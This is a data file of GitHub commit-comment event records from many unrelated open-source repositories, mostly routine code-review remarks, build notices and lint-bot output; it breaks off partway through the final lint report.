{"id":"7992365921","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29772708,"position":104,"line":105,"path":"src/hdskins/java/com/voxelmodpack/hdskins/resources/SkinResourceManager.java","commit_id":"dfd3c6f2ea50039ee83042bdfd95d65d88e92f7a","created_at":"2018-07-20T00:56:41Z","updated_at":"2018-07-20T00:56:41Z","author_association":"MEMBER","body":"This makes the line a little long."}},"created_at":"2018-07-20T00:56:41Z"}
{"id":"7992370056","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29772723,"position":8,"line":49,"path":"sql/schema.sql","commit_id":"0e0ada1d1be7c89f74e80caa8b0f40d63b050df7","created_at":"2018-07-20T00:58:29Z","updated_at":"2018-07-20T00:58:29Z","author_association":"COLLABORATOR","body":"Should every user only have one role? Some users can have a different role on different tickets (e.g. if I create a ticket, I should have permissions to edit that ticket but I should not have permissions to view another ticket unrelated to me?)\r\n\r\nWhat you can do is try adding two columns as your primary key. Your two columns can be userid and ticketid so that every user has 1 role for a specific ticket. "}},"created_at":"2018-07-20T00:58:29Z"}
{"id":"7992370468","type":"CommitCommentEvent","actor":{"login":"0Lucifer0"},"repo":{"name":"NosCoreIO/NosCore"},"payload":{"comment":{"id":29772724,"position":44,"line":49,"path":"src/NosCore.GameObject/Character.cs","commit_id":"54132d31b829a7f80212bae304e78fc2ee86b80c","created_at":"2018-07-20T00:58:40Z","updated_at":"2018-07-20T00:58:40Z","author_association":"COLLABORATOR","body":"Nope just no set and get take the method of your set to return true or false."}},"created_at":"2018-07-20T00:58:40Z"}
{"id":"7992374872","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29772745,"position":null,"line":null,"path":null,"commit_id":"23206100198dfdd3c789773e953a232e442bdc48","created_at":"2018-07-20T01:00:28Z","updated_at":"2018-07-20T01:00:28Z","author_association":"CONTRIBUTOR","body":"> I'd like to point out that in some cases they are running their script right from the document header as data-url (<script src=\"data:...\"></script>) \r\n\r\n@lainverse just fyi a quick search found these domains using the same technique\r\n````\r\nepravda.com.ua\r\neurointegration.com.ua\r\nnovosti-n.org\r\nonanistov.net\r\nrefine.org.ua\r\n````\r\nall are fixed by \r\n`example.com##script:inject(abort-on-property-read.js, mz_str)`"}},"created_at":"2018-07-20T01:00:28Z"}
{"id":"7992375651","type":"CommitCommentEvent","actor":{"login":"dasistwas"},"repo":{"name":"michaelpollak/moodle-mod_datalynx"},"payload":{"comment":{"id":29772747,"position":11,"line":11,"path":"amd/src/behavior.js","commit_id":"09c519275920ca820d2ede663eca8796380ac382","created_at":"2018-07-20T01:00:47Z","updated_at":"2018-07-20T01:00:47Z","author_association":"NONE","body":"You do not get sesskey like this. Get it like that:\r\n M.cfg.sesskey \r\n\r\nHave a look at the source of a Moodle page in the browser, then you will find M.cfg and there you can get a lot of data.\r\n\r\n![bildschirmfoto 2018-07-20 03 00 20](https://user-images.githubusercontent.com/1620975/42977709-1626869e-8bc9-11e8-9869-08bb6ec76b78.png)\r\n"}},"created_at":"2018-07-20T01:00:47Z"}
{"id":"7992376755","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29772748,"position":6,"line":10,"path":"ticketing/views/ActiveTicket.py","commit_id":"0e0ada1d1be7c89f74e80caa8b0f40d63b050df7","created_at":"2018-07-20T01:01:15Z","updated_at":"2018-07-20T01:01:15Z","author_association":"COLLABORATOR","body":"What should the roles be, these seem arbitrary. \r\n\r\nMaybe you could keep it simple at first: Viewer, Editor, None"}},"created_at":"2018-07-20T01:01:15Z"}
{"id":"7992376943","type":"CommitCommentEvent","actor":{"login":"adarshp"},"repo":{"name":"ml4ai/delphi"},"payload":{"comment":{"id":29772749,"position":null,"line":null,"path":null,"commit_id":"2499175d6ffde65891ba5e7832094d8b8ae10c1d","created_at":"2018-07-20T01:01:19Z","updated_at":"2018-07-20T01:01:19Z","author_association":"COLLABORATOR","body":"@pauldhein I added this script to convert the Jupyter notebook to HTML, with long cell outputs now truncated and scrollable (see `demo.tpl` in the same directory.)"}},"created_at":"2018-07-20T01:01:19Z"}
{"id":"7992378077","type":"CommitCommentEvent","actor":{"login":"dasistwas"},"repo":{"name":"michaelpollak/moodle-mod_datalynx"},"payload":{"comment":{"id":29772751,"position":5,"line":5,"path":"amd/src/behavior.js","commit_id":"09c519275920ca820d2ede663eca8796380ac382","created_at":"2018-07-20T01:01:46Z","updated_at":"2018-07-20T01:01:46Z","author_association":"NONE","body":"Not sure if using the element table in the selector is a good idea. Do you really need that?"}},"created_at":"2018-07-20T01:01:46Z"}
{"id":"7992379268","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29772755,"position":7,"line":11,"path":"ticketing/views/AllTicket.py","commit_id":"0e0ada1d1be7c89f74e80caa8b0f40d63b050df7","created_at":"2018-07-20T01:02:14Z","updated_at":"2018-07-20T01:02:14Z","author_association":"COLLABORATOR","body":"dont redefine these enums, it'd be better to have a globals.py where you can define all shared data and functions to be used across all functions"}},"created_at":"2018-07-20T01:02:14Z"}
{"id":"7992381536","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29772759,"position":null,"line":null,"path":null,"commit_id":"d66c075c4650cfa8dca0a6eefa22fc3de1678657","created_at":"2018-07-20T01:03:07Z","updated_at":"2018-07-20T01:03:07Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.355`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/406061147) :tada:"}},"created_at":"2018-07-20T01:03:07Z"}
{"id":"7992381588","type":"CommitCommentEvent","actor":{"login":"luckman212"},"repo":{"name":"pfsense/pfsense"},"payload":{"comment":{"id":29772761,"position":null,"line":null,"path":null,"commit_id":"040a1579e474290abfc7a4a445e310ce8e462847","created_at":"2018-07-20T01:03:08Z","updated_at":"2018-07-20T01:03:08Z","author_association":"MEMBER","body":"Since I think \"ms\" is much more widely used and easier to comprehend, how about using \r\n\r\n`echo \">>> Gateway alarm: ${GW} (Addr:${alarm_addr} Alarm:${alarm_flag} RTT:$( expr ${alarm_rtt} / 1000 )ms RTTsd:$( expr ${alarm_rttsd} / 1000 )ms Loss:${alarm_loss}%)\" | /usr/bin/logger -p daemon.info -i -t rc.gateway_alarm`\r\n\r\ninstead?\r\n"}},"created_at":"2018-07-20T01:03:08Z"}
{"id":"7992382380","type":"CommitCommentEvent","actor":{"login":"masutaka"},"repo":{"name":"masutaka/circleci-bundle-update-pr"},"payload":{"comment":{"id":29772763,"position":null,"line":null,"path":null,"commit_id":"08362dc4e97576ebc7bd12f9e193fa7fd4413e78","created_at":"2018-07-20T01:03:27Z","updated_at":"2018-07-20T01:03:27Z","author_association":"OWNER","body":"It works well!"}},"created_at":"2018-07-20T01:03:27Z"}
{"id":"7992383719","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29772765,"position":28,"line":25,"path":"ticketing/views/AllTicket.py","commit_id":"0e0ada1d1be7c89f74e80caa8b0f40d63b050df7","created_at":"2018-07-20T01:04:02Z","updated_at":"2018-07-20T01:04:02Z","author_association":"COLLABORATOR","body":"is this the correct exception to have if you don't have the appropriate permissions?\r\n\r\nShouldn't you display a \"bad permissions\" message if the if statement is not true? "}},"created_at":"2018-07-20T01:04:02Z"}
{"id":"7992384150","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29772768,"position":35,"line":32,"path":"ticketing/views/AllTicket.py","commit_id":"0e0ada1d1be7c89f74e80caa8b0f40d63b050df7","created_at":"2018-07-20T01:04:13Z","updated_at":"2018-07-20T01:04:13Z","author_association":"COLLABORATOR","body":"see above"}},"created_at":"2018-07-20T01:04:13Z"}
{"id":"7992384454","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29772770,"position":8,"line":10,"path":"ticketing/views/NewTicket.py","commit_id":"0e0ada1d1be7c89f74e80caa8b0f40d63b050df7","created_at":"2018-07-20T01:04:20Z","updated_at":"2018-07-20T01:04:20Z","author_association":"COLLABORATOR","body":"see above"}},"created_at":"2018-07-20T01:04:20Z"}
{"id":"7992385353","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29772772,"position":49,"line":37,"path":"ticketing/views/NewTicket.py","commit_id":"0e0ada1d1be7c89f74e80caa8b0f40d63b050df7","created_at":"2018-07-20T01:04:44Z","updated_at":"2018-07-20T01:04:44Z","author_association":"COLLABORATOR","body":"is NameError the exception you get if you don't have permissions? thats not what a NameError is..."}},"created_at":"2018-07-20T01:04:44Z"}
{"id":"7992391555","type":"CommitCommentEvent","actor":{"login":"czlee"},"repo":{"name":"TabbycatDebate/tabbycat"},"payload":{"comment":{"id":29772788,"position":22,"line":42,"path":"tabbycat/privateurls/views.py","commit_id":"3b6005f7ede91097db99a31fb93da747ce3e4559","created_at":"2018-07-20T01:07:19Z","updated_at":"2018-07-20T01:07:19Z","author_association":"MEMBER","body":"Heads up, if I'm not mistaken, the removal of this line causes _all_ adjudicators in the database to appear on the page \"email ballot URLs\" page, so I restored it in cd9eaf30."}},"created_at":"2018-07-20T01:07:19Z"}
{"id":"7992392063","type":"CommitCommentEvent","actor":{"login":"czlee"},"repo":{"name":"TabbycatDebate/tabbycat"},"payload":{"comment":{"id":29772791,"position":38,"line":57,"path":"tabbycat/privateurls/views.py","commit_id":"3b6005f7ede91097db99a31fb93da747ce3e4559","created_at":"2018-07-20T01:07:33Z","updated_at":"2018-07-20T01:07:33Z","author_association":"MEMBER","body":"Ditto for the line (as above), restored in cd9eaf30."}},"created_at":"2018-07-20T01:07:33Z"}
{"id":"7992393595","type":"CommitCommentEvent","actor":{"login":"bee7813993"},"repo":{"name":"bee7813993/KaraokeRequestorWeb"},"payload":{"comment":{"id":29772797,"position":null,"line":null,"path":null,"commit_id":"31969a6d75fe749285dfbc9ac1b63b05924f2abb","created_at":"2018-07-20T01:08:12Z","updated_at":"2018-07-20T01:08:12Z","author_association":"OWNER","body":"Fix: #102 "}},"created_at":"2018-07-20T01:08:12Z"}
{"id":"7992394344","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29772798,"position":null,"line":null,"path":null,"commit_id":"d71098149d6c3dd7945592993aeda644f87ec7df","created_at":"2018-07-20T01:08:32Z","updated_at":"2018-07-20T01:08:32Z","author_association":"COLLABORATOR","body":"will comment on confirming emails when it is complete"}},"created_at":"2018-07-20T01:08:32Z"}
{"id":"7992401094","type":"CommitCommentEvent","actor":{"login":"dasistwas"},"repo":{"name":"michaelpollak/moodle-mod_datalynx"},"payload":{"comment":{"id":29772811,"position":11,"line":11,"path":"amd/src/behavior.js","commit_id":"09c519275920ca820d2ede663eca8796380ac382","created_at":"2018-07-20T01:11:21Z","updated_at":"2018-07-20T01:11:21Z","author_association":"NONE","body":"Example:\r\nhttps://github.com/thauska/snap_V1/blob/4ee105a964ba8c5b50a1c56b05210b6041c2bd2d/amd/src/section_asset_management.js#L202"}},"created_at":"2018-07-20T01:11:21Z"}
{"id":"7992401104","type":"CommitCommentEvent","actor":{"login":"fredericDelaporte"},"repo":{"name":"nhibernate/NHibernate.AspNetCore.Identity"},"payload":{"comment":{"id":29772812,"position":4,"line":4,"path":".vscode/launch.json","commit_id":"9c6d2340969d048bffbd0ecf56ea3707abb141a1","created_at":"2018-07-20T01:11:21Z","updated_at":"2018-07-20T01:11:21Z","author_association":"MEMBER","body":".vscode should be in gitignore and removed from repository."}},"created_at":"2018-07-20T01:11:21Z"}
{"id":"7992401710","type":"CommitCommentEvent","actor":{"login":"wodonggun"},"repo":{"name":"wodonggun/TIL"},"payload":{"comment":{"id":29772814,"position":38,"line":1,"path":"README.md","commit_id":"81716b91fc2551c3ac2220246bec00e66407878f","created_at":"2018-07-20T01:11:38Z","updated_at":"2018-07-20T01:11:38Z","author_association":"OWNER","body":"오늘은 커밋 안해도 됩니다. "}},"created_at":"2018-07-20T01:11:38Z"}
{"id":"7992404926","type":"CommitCommentEvent","actor":{"login":"pickfire"},"repo":{"name":"chubin/cheat.sh"},"payload":{"comment":{"id":29772823,"position":null,"line":null,"path":null,"commit_id":"ada92527301e63e412c67530ae20822adb4aa561","created_at":"2018-07-20T01:13:02Z","updated_at":"2018-07-20T01:13:02Z","author_association":"NONE","body":"Okay, doesn't really hurt here. I guess this is fine."}},"created_at":"2018-07-20T01:13:02Z"}
{"id":"7992409693","type":"CommitCommentEvent","actor":{"login":"radwankakar"},"repo":{"name":"drupal/drupal"},"payload":{"comment":{"id":29772831,"position":null,"line":null,"path":null,"commit_id":"a7fdfb64693d00bd7e094ccda45c3e58581b8bbe","created_at":"2018-07-20T01:15:06Z","updated_at":"2018-07-20T01:15:06Z","author_association":"NONE","body":"I think we are missing one use case, I have seen many URLs with the QueryString key without value, i.e http://www.google.com?news, Drupal change the url to http://www.google.com?news= which actually breaks the link. \r\nWe don't have this issue on Drupal 8.5.3"}},"created_at":"2018-07-20T01:15:06Z"}
{"id":"7992411347","type":"CommitCommentEvent","actor":{"login":"mathieujobin"},"repo":{"name":"cucumber/cucumber-ruby"},"payload":{"comment":{"id":29772837,"position":null,"line":null,"path":null,"commit_id":"5f811ce3b6bd46a89a06e4441a2463450f83fb60","created_at":"2018-07-20T01:15:45Z","updated_at":"2018-07-20T01:15:45Z","author_association":"MEMBER","body":"I don't see the value in this change ... now we need to have quotes on our cucumber command line and I am having a hard time passing it through my script into travis...."}},"created_at":"2018-07-20T01:15:45Z"}
{"id":"7992414187","type":"CommitCommentEvent","actor":{"login":"SwiftFlying"},"repo":{"name":"JyeSmith/rx5808-pro-diversity"},"payload":{"comment":{"id":29772847,"position":null,"line":null,"path":null,"commit_id":"e26dcade340bc1f7310cc18ff8ae5befa997ae84","created_at":"2018-07-20T01:16:58Z","updated_at":"2018-07-20T01:16:58Z","author_association":"NONE","body":"Can you develop a STM32 diversity receiver? I can design a hardware circuit"}},"created_at":"2018-07-20T01:16:58Z"}
{"id":"7992423653","type":"CommitCommentEvent","actor":{"login":"dennypage"},"repo":{"name":"pfsense/pfsense"},"payload":{"comment":{"id":29772872,"position":null,"line":null,"path":null,"commit_id":"040a1579e474290abfc7a4a445e310ce8e462847","created_at":"2018-07-20T01:20:56Z","updated_at":"2018-07-20T01:20:56Z","author_association":"CONTRIBUTOR","body":"Not a good idea in my opinion. In high speed man networks, us is more common. Long haul fiber is only 8us per mile. You need alarm values below 1ms. \n\n\n> On Jul 19, 2018, at 20:03, Luke Hamburg <notifications@github.com> wrote:\n> \n> Since I think \"ms\" is much more widely used and easier to comprehend, how about using\n> \n> echo \">>> Gateway alarm: ${GW} (Addr:${alarm_addr} Alarm:${alarm_flag} RTT:$( expr ${alarm_rtt} / 1000 )ms RTTsd:$( expr ${alarm_rttsd} / 1000 )ms Loss:${alarm_loss}%)\" | /usr/bin/logger -p daemon.info -i -t rc.gateway_alarm\n> \n> instead?\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-20T01:20:56Z"}
{"id":"7992427109","type":"CommitCommentEvent","actor":{"login":"beginor"},"repo":{"name":"nhibernate/NHibernate.AspNetCore.Identity"},"payload":{"comment":{"id":29772885,"position":4,"line":4,"path":".vscode/launch.json","commit_id":"9c6d2340969d048bffbd0ecf56ea3707abb141a1","created_at":"2018-07-20T01:22:22Z","updated_at":"2018-07-20T01:22:22Z","author_association":"CONTRIBUTOR","body":"ok, I will remove it."}},"created_at":"2018-07-20T01:22:22Z"}
{"id":"7992435135","type":"CommitCommentEvent","actor":{"login":"Robbbert"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29772898,"position":null,"line":null,"path":null,"commit_id":"375427dcee1f354ea7b0171ac3a584bd7a85a2e2","created_at":"2018-07-20T01:25:41Z","updated_at":"2018-07-20T01:25:41Z","author_association":"CONTRIBUTOR","body":"Validation errors:\r\nRCA CDP1802 device 'cdp1802': Write callback bound to non-existent object tag cdp1852_printer (cdp1852_device::clock_w)\r\nRCA CDP1802 device 'cdp1802': io space memory map entry writes to nonexistent device 'cdp1852_printer'\r\nRCA CDP1802 I/O device 'cdp1852_kb': Multiple devices with same tag defined.\r\n"}},"created_at":"2018-07-20T01:25:41Z"}
{"id":"7992435641","type":"CommitCommentEvent","actor":{"login":"bradharding"},"repo":{"name":"bradharding/doomretro"},"payload":{"comment":{"id":29772900,"position":null,"line":null,"path":null,"commit_id":"1c624860020fe5a517bf83b4d87ace9374cb86fe","created_at":"2018-07-20T01:25:55Z","updated_at":"2018-07-20T01:25:55Z","author_association":"OWNER","body":"Then it's not sound-related. I'll need to start looking elsewhere."}},"created_at":"2018-07-20T01:25:55Z"}
{"id":"7992436886","type":"CommitCommentEvent","actor":{"login":"beginor"},"repo":{"name":"nhibernate/NHibernate.AspNetCore.Identity"},"payload":{"comment":{"id":29772902,"position":4,"line":4,"path":".vscode/launch.json","commit_id":"9c6d2340969d048bffbd0ecf56ea3707abb141a1","created_at":"2018-07-20T01:26:27Z","updated_at":"2018-07-20T01:26:27Z","author_association":"CONTRIBUTOR","body":".vscode directory contains useful tasks config, I think it is better to keep it here."}},"created_at":"2018-07-20T01:26:27Z"}
{"id":"7992437211","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29772903,"position":null,"line":null,"path":null,"commit_id":"58e7a43b3274aeb0238da56a68fb2eb4c90decee","created_at":"2018-07-20T01:26:36Z","updated_at":"2018-07-20T01:26:36Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1694 of 1694 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-58e7a43b3274aeb0238da56a68fb2eb4c90decee-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-58e7a43b3274aeb0238da56a68fb2eb4c90decee-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-58e7a43b3274aeb0238da56a68fb2eb4c90decee-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-20T01:26:36Z"}
{"id":"7992444191","type":"CommitCommentEvent","actor":{"login":"caragpe"},"repo":{"name":"caragpe/bdd_testing"},"payload":{"comment":{"id":29772919,"position":null,"line":null,"path":null,"commit_id":"a5693bdbcaa888391d4b4c3f8c6a0534e5ba9e47","created_at":"2018-07-20T01:29:33Z","updated_at":"2018-07-20T01:29:33Z","author_association":"OWNER","body":"Unit tests pending!"}},"created_at":"2018-07-20T01:29:33Z"}
{"id":"7992448543","type":"CommitCommentEvent","actor":{"login":"yl5006"},"repo":{"name":"mavlink/qgroundcontrol"},"payload":{"comment":{"id":29772930,"position":null,"line":null,"path":null,"commit_id":"440913db7d133c603c4c98372b42c326b256ad86","created_at":"2018-07-20T01:31:16Z","updated_at":"2018-07-20T01:31:16Z","author_association":"CONTRIBUTOR","body":"there is another method to fix this\r\nadd one   property  in QGCMapCircleVisuals.qml\r\nproperty real       _radius:        mapCircle.radius.rawValue\r\n\r\nand GuidedActionsController.qml call this  orbitMapCircle._radius"}},"created_at":"2018-07-20T01:31:16Z"}
{"id":"7992451810","type":"CommitCommentEvent","actor":{"login":"sam31415"},"repo":{"name":"enigmampc/catalyst"},"payload":{"comment":{"id":29772944,"position":null,"line":null,"path":null,"commit_id":"1f83c45b277d2f5122abfcd53d0b9a89df069e77","created_at":"2018-07-20T01:32:36Z","updated_at":"2018-07-20T01:32:36Z","author_association":"NONE","body":"I'm just saying that unless it's inevitable, making changes that break existing algorithms should be avoided. Moreover, when you do make such a change, it would be good to mention it in the release notes. In the present case, any user updating will see their algorithms crash, and they'll all have to try to figure out why."}},"created_at":"2018-07-20T01:32:36Z"}
{"id":"7992459095","type":"CommitCommentEvent","actor":{"login":"Chan9390"},"repo":{"name":"ReconVillage/reconvillage"},"payload":{"comment":{"id":29772968,"position":null,"line":null,"path":null,"commit_id":"3730a76f9221f86a40cb587e094a7779a77c5681","created_at":"2018-07-20T01:35:40Z","updated_at":"2018-07-20T01:35:40Z","author_association":"NONE","body":":+1: "}},"created_at":"2018-07-20T01:35:40Z"}
{"id":"7992463870","type":"CommitCommentEvent","actor":{"login":"arjenbloemsma"},"repo":{"name":"arjenbloemsma/spo-rename-installation-webpart"},"payload":{"comment":{"id":29772980,"position":null,"line":null,"path":null,"commit_id":"3440db97078c015040815b05adcda6fc7363c4cb","created_at":"2018-07-20T01:37:36Z","updated_at":"2018-07-20T01:37:36Z","author_association":"OWNER","body":"Thanks to @shotor"}},"created_at":"2018-07-20T01:37:36Z"}
{"id":"7992468997","type":"CommitCommentEvent","actor":{"login":"yebinable"},"repo":{"name":"yebinable/kindergarten"},"payload":{"comment":{"id":29772992,"position":null,"line":null,"path":null,"commit_id":"abab6894b70843135c3bcb38e3362fbf277c4d18","created_at":"2018-07-20T01:39:48Z","updated_at":"2018-07-20T01:39:48Z","author_association":"OWNER","body":"20180720-10:39 까지 최종\r\n1. 몽고로그 저장\r\n2. 네이버/카카오 로그인\r\n업데이트 됨"}},"created_at":"2018-07-20T01:39:48Z"}
{"id":"7992475850","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":29773014,"position":null,"line":null,"path":null,"commit_id":"15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37","created_at":"2018-07-20T01:42:36Z","updated_at":"2018-07-20T01:42:36Z","author_association":"NONE","body":"[R/as_char_no_warn.R:27:12:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/R/as_char_no_warn.R#L27) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return(fastIntToStringRcpp(x))\n           ^~~~~~~~~~~~~~~~~~~\n```\n[R/categorize.R:63:39:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/R/categorize.R#L63) *style:* **Variable and function names should be all lowercase.**\n```r\n​                       comorbid_fun = comorbidMatMul,\n                                      ^~~~~~~~~~~~~~\n```\n[R/categorize.R:177:46:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/R/categorize.R#L177) *style:* **Variable and function names should be all lowercase.**\n```r\n​                              comorbid_fun = comorbidMatMulSimple,\n                                             ^~~~~~~~~~~~~~~~~~~~\n```\n[R/comorbid.R:215:42:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/R/comorbid.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​                          comorbid_fun = comorbidMatMulSimple,\n                                         ^~~~~~~~~~~~~~~~~~~~\n```\n[R/guess.R:132:1:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/R/guess.R#L132) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​guess_version.data.frame <- function(x, short_code = NULL, icd_name = NULL, ...) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/guess.R:191:10:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/R/guess.R#L191) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​  ver <- guess_version.data.frame(x, icd_name = icd_name)\n         ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/parse.R:268:10:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/R/parse.R#L268) *style:* **Variable and function names should be all lowercase.**\n```r\n​  out <- fixSubchapterNa(out, \"740\", \"759\")\n         ^~~~~~~~~~~~~~~\n```\n[R/parse.R:270:10:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/R/parse.R#L270) *style:* **Variable and function names should be all lowercase.**\n```r\n​  out <- fixSubchapterNa(out, \"280\", \"289\")\n         ^~~~~~~~~~~~~~~\n```\n[R/parse.R:304:1:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/R/parse.R#L304) *style:* **Variable and function names should be all lowercase.**\n```r\n​fixSubchapterNa <- function(x, start, end) {\n^~~~~~~~~~~~~~~\n```\n[R/score.R:74:1:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/R/score.R#L74) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​charlson.data.frame <- function(x, visit_name = NULL,\n^~~~~~~~~~~~~~~~~~~\n```\n[R/score.R:308:1:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/R/score.R#L308) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​van_walraven.data.frame <- function(x, visit_name = NULL, return_df = FALSE,\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/util.R:189:1:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/R/util.R#L189) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​get_visit_name.data.frame <- function(x, visit_name = NULL) {\n^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:606:5:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-comorbid-maps-icd9.R#L606) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\"),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:616:5:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-comorbid-maps-icd9.R#L616) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 1, chunk_size = 32),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:617:5:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-comorbid-maps-icd9.R#L617) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 3, chunk_size = 32)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:620:5:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-comorbid-maps-icd9.R#L620) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 2, chunk_size = 32),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:621:5:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-comorbid-maps-icd9.R#L621) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 5, chunk_size = 32)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:624:5:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-comorbid-maps-icd9.R#L624) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 3, chunk_size = 1),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:625:5:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/tests-deprecated/test-comorbid-maps-icd9.R#L625) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 3, chunk_size = 32)\n    